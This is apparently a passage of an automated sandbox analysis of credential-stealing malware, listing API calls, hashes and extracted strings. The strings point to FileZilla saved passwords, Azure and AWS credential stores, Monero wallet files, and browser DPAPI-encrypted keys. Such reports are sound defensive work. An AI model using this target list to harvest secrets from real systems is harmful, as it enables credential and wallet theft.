            • strtok_s.MSVCRT ref: 004104B9
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strtok_s$mallocmemsetstrncpy
            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
            • API String ID: 2676359353-555421843
            • Opcode ID: d7e577ce13692004329fb370cb3b00ccbaeca2739e1146d2b69afdd9ee3d53ba
            • Instruction ID: f2c119995f801d95b771d97b8d40ebd85ad32e2919b54f786426441ea9706e1a
            • Opcode Fuzzy Hash: d7e577ce13692004329fb370cb3b00ccbaeca2739e1146d2b69afdd9ee3d53ba
            • Instruction Fuzzy Hash: BBD1A571A00108ABCB04EBF1DC4AEEE7739AF54314F50851EF103A7191DF78AA95CB69
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memset
            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$Z\A$\.IdentityService\$\.aws\$\.azure\$msal.cache
            • API String ID: 2221118986-156850865
            • Opcode ID: 9bcfa3529e603d52dd8ad33e36109966c27d26eb48124b6c4715542f7bf6ad63
            • Instruction ID: 646ecaa1659512b06866923d8f1ff883aab6ee332b32f164b7e7d78f354b44b8
            • Opcode Fuzzy Hash: 9bcfa3529e603d52dd8ad33e36109966c27d26eb48124b6c4715542f7bf6ad63
            • Instruction Fuzzy Hash: C741FC75A4021867CB20F760EC4BFDD773C5B54704F404459B64AA60D2EEFC57C98BAA
            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
            • memcpy.MSVCRT(?), ref: 00405F4E
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$memcpy$CrackInternet
            • String ID: "$"$------$------$------$XA$XA
            • API String ID: 4271525049-2501203334
            • Opcode ID: e5b182b8087e0edd649b211e19a2904699373939d329d9db10a108da200391d1
            • Instruction ID: fd4032899b6f210ca5ed4ade58f42d7f74ab7cfcec1a01a64090ede90c3e384c
            • Opcode Fuzzy Hash: e5b182b8087e0edd649b211e19a2904699373939d329d9db10a108da200391d1
            • Instruction Fuzzy Hash: 4C123F71921118ABCB14EBA1DC95FEEB338BF14314F40419EF50662191EF782B99CF69
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$18A
            • API String ID: 0-3461493422
            • Opcode ID: 726007c070200b8b6ccd5e432aca5a88abac811a359fd20cf8ca828f6c5e6349
            • Instruction ID: eff374fbcd62c6e18ab1f1aaab25817c9043c0eeef42efb3c17498ac9b2729e3
            • Opcode Fuzzy Hash: 726007c070200b8b6ccd5e432aca5a88abac811a359fd20cf8ca828f6c5e6349
            • Instruction Fuzzy Hash: 93A18FB1A00218ABCB34DFA4DC85FEE7379BF48305F448589E50D96181EB789B89CF65
            APIs
            • strlen.MSVCRT ref: 004169BF
            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00416C3A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004169ED
              • Part of subcall function 00416670: strlen.MSVCRT ref: 00416681
              • Part of subcall function 00416670: strlen.MSVCRT ref: 004166A5
            • VirtualQueryEx.KERNEL32(00416DAD,00000000,?,0000001C), ref: 00416A32
            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00416C3A), ref: 00416B53
              • Part of subcall function 00416880: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416898
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strlen$MemoryProcessQueryReadVirtual
            • String ID: :lA$@
            • API String ID: 2950663791-2855229504
            • Opcode ID: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
            • Instruction ID: 51c9d4b078fe92f83ab81220ebbaf7cdf2a8f9ee762561721c09ea6573e6fdbd
            • Opcode Fuzzy Hash: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
            • Instruction Fuzzy Hash: 845108B5E04119ABDB04CF94D981AEFB7B5FF88304F108519F915A7240D738EA51CBA9
            APIs
            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00416B7E
            • OpenProcess.KERNEL32(001FFFFF,00000000,00416DAD,004205AD), ref: 00416BBC
            • memset.MSVCRT ref: 00416C0A
            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00416D5E
            Strings
            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00416C2C
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: OpenProcessmemset
            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
            • API String ID: 1606381396-4138519520
            • Opcode ID: 985516fdb4aba9a37da67002539eb8a614f9f3b36bd237ff0cc46e5de52e8429
            • Instruction ID: 7f38ab3eb3b1a919a3e5ec0c0fab515e305e32cb9f2de8b47bf31e49bfe0b2e9
            • Opcode Fuzzy Hash: 985516fdb4aba9a37da67002539eb8a614f9f3b36bd237ff0cc46e5de52e8429
            • Instruction Fuzzy Hash: 285162B0D002189BDB24EB95DC45BEEB774AF44318F5041AEE50566281EB78AEC8CF5D
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memset
            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
            • API String ID: 2221118986-218353709
            • Opcode ID: 917d05209e3c6e9ca6065a0a923e579d9e5d238dbdb3523c9004ab1032494658
            • Instruction ID: b5eb1e2d9a8a1e3cf56e2c34e54d9e93e9a372b4459d7a8870c797c8d4c08f80
            • Opcode Fuzzy Hash: 917d05209e3c6e9ca6065a0a923e579d9e5d238dbdb3523c9004ab1032494658
            • Instruction Fuzzy Hash: AB5184B1D501186BCB14EB61DC96FED733CAF50314F4041ADB60A62092EE785BD9CBAA
            APIs
              • Part of subcall function 004062D0: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000,00420DE3), ref: 00406331
              • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
              • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 004063D5
              • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
            • strtok.MSVCRT(00000000,?), ref: 00414E7E
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: HttpInternetOpenRequest$ConnectSendstrtok
            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
            • API String ID: 1208788097-1526165396
            • Opcode ID: 403038929566516ced08024de874d387cf2f9a99d356b9ee5bed260c26f508a9
            • Instruction ID: 8f24e6183c5aafacdfff780c7fa5c74c912095ee1ff337cf81358bf1c292c6a0
            • Opcode Fuzzy Hash: 403038929566516ced08024de874d387cf2f9a99d356b9ee5bed260c26f508a9
            • Instruction Fuzzy Hash: D5516130911108ABCB14FF61CC9AEED7738AF50358F50401EF80B665A2DF786B95CB6A
            APIs
            • __lock.LIBCMT ref: 0041AD5A
              • Part of subcall function 0041A97C: __mtinitlocknum.LIBCMT ref: 0041A992
              • Part of subcall function 0041A97C: __amsg_exit.LIBCMT ref: 0041A99E
              • Part of subcall function 0041A97C: EnterCriticalSection.KERNEL32(?,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041A9A6
            • DecodePointer.KERNEL32(0042A0C8,00000020,0041AE9D,?,00000001,00000000,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E), ref: 0041AD96
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADA7
              • Part of subcall function 0041B7F5: EncodePointer.KERNEL32(00000000,0041BA52,0042BDB8,00000314,00000000,?,?,?,?,?,0041B0C8,0042BDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B7F7
            • DecodePointer.KERNEL32(-00000004,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADCD
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADE0
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A088,0000000C,0041A5FA), ref: 0041ADEA
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
            • String ID:
            • API String ID: 2005412495-0
            • Opcode ID: 9dbc0315d39e44e03e69b1948a2dcd69f9a60bb4760d8e37f8bab661b8eb1333
            • Instruction ID: 26cd67dfac1a625c080c990f5aa3a4e8d575379cc8cf2dcf3c78269be391da57
            • Opcode Fuzzy Hash: 9dbc0315d39e44e03e69b1948a2dcd69f9a60bb4760d8e37f8bab661b8eb1333
            • Instruction Fuzzy Hash: CB3129B09423498FDF109FA9D9452DEBBF1BF48314F14402BD410A6251DBBC48A5CF6E
            APIs
            • __getptd.LIBCMT ref: 0041C3D9
              • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
              • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
            • __amsg_exit.LIBCMT ref: 0041C3F9
            • __lock.LIBCMT ref: 0041C409
            • InterlockedDecrement.KERNEL32(?), ref: 0041C426
            • free.MSVCRT ref: 0041C439
            • InterlockedIncrement.KERNEL32(0042B558), ref: 0041C451
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
            • String ID:
            • API String ID: 634100517-0
            • Opcode ID: 68cb7e6ea9f2ec8c328fe504e648b6640a528a258a727550de86b644f98f4ab2
            • Instruction ID: 347e950a9de730bb6983817e76a39e35d30df20f4a69820d490e6e24dcd4e02e
            • Opcode Fuzzy Hash: 68cb7e6ea9f2ec8c328fe504e648b6640a528a258a727550de86b644f98f4ab2
            • Instruction Fuzzy Hash: 7D010431A826219BD720AB669C857EEB760BB04714F41811BE94463391CB3C68D2CFDE
            APIs
            • __getptd.LIBCMT ref: 0041C13D
              • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
              • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
            • __getptd.LIBCMT ref: 0041C154
            • __amsg_exit.LIBCMT ref: 0041C162
            • __lock.LIBCMT ref: 0041C172
            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C186
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
            • String ID:
            • API String ID: 938513278-0
            • Opcode ID: c97b1cd8c1bf5e7720fb8207f6683a26967bfbf4c7aefb49925ecc618f12c84f
            • Instruction ID: 8423f9a113a1835f1d35103eff65ed0838148ed172a20d49ff88b4dc443596f5
            • Opcode Fuzzy Hash: c97b1cd8c1bf5e7720fb8207f6683a26967bfbf4c7aefb49925ecc618f12c84f
            • Instruction Fuzzy Hash: 9EF06271AD5310ABD720BBA95C427DA3790AF00728F15410FE454A62D3CB6C58D19A9E
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __aulldiv
            • String ID: %d MB$@
            • API String ID: 3732870572-3474575989
            • Opcode ID: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
            • Instruction ID: f6ead53c39b4582a22ff827f4f83d0c2aee1884270de42e44796eba59a74ffdb
            • Opcode Fuzzy Hash: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
            • Instruction Fuzzy Hash: AD218CF1E44218ABDB10DFD8CC49FAEB7B9FB08B14F104509F605BB280D77869018BA9
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memcmpmemset
            • String ID: @$v10
            • API String ID: 1065087418-24753345
            • Opcode ID: 8900047ccc3a7ea6eca2ef2dfc1eae2581b6e08053fcaf9ffe0f5684236083b7
            • Instruction ID: 07f8737455eafbd8f61b9e4d9b284130f9ce7af93f488edb76ba3c8551e2a7c8
            • Opcode Fuzzy Hash: 8900047ccc3a7ea6eca2ef2dfc1eae2581b6e08053fcaf9ffe0f5684236083b7
            • Instruction Fuzzy Hash: 23414870A0020CEBCB04DFA4CC99BEE77B5BF44304F108029F905AB295DBB8AD45CB99
            APIs
            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409DE2
              • Part of subcall function 00409BB0: memcpy.MSVCRT(?,?,?), ref: 00409C16
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memcmpmemcpy
            • String ID: $"encrypted_key":"$DPAPI
            • API String ID: 1784268899-738592651
            • Opcode ID: 740c6884d9f561bb7ce577100f1b7d1c7d71afeb4ed27ad6aba31cad7ccdc5b7
            • Instruction ID: 7f392d33d6ad21de2d61bb21213a98381b23072c845d074b64d64ac31095145a
            • Opcode Fuzzy Hash: 740c6884d9f561bb7ce577100f1b7d1c7d71afeb4ed27ad6aba31cad7ccdc5b7
            • Instruction Fuzzy Hash: 7A3150B5D00108ABCB04DBE4DC45AEF77B8AF48304F44856AE915B3282E7789E44CBA5
            APIs
            • memset.MSVCRT ref: 00407354
            • task.LIBCPMTD ref: 00407595
              • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memsettaskvsprintf_s
            • String ID: Password
            • API String ID: 2675463923-3434357891
            • Opcode ID: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
            • Instruction ID: 975b1f2fff90f96d03099a1470760af69fc6b50b1064dc5ad3510b71ddc5061f
            • Opcode Fuzzy Hash: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
            • Instruction Fuzzy Hash: 52613DB5D041689BDB24DF50CC41BDAB7B8BF48304F0081EAE689A6181DFB46BC9CF95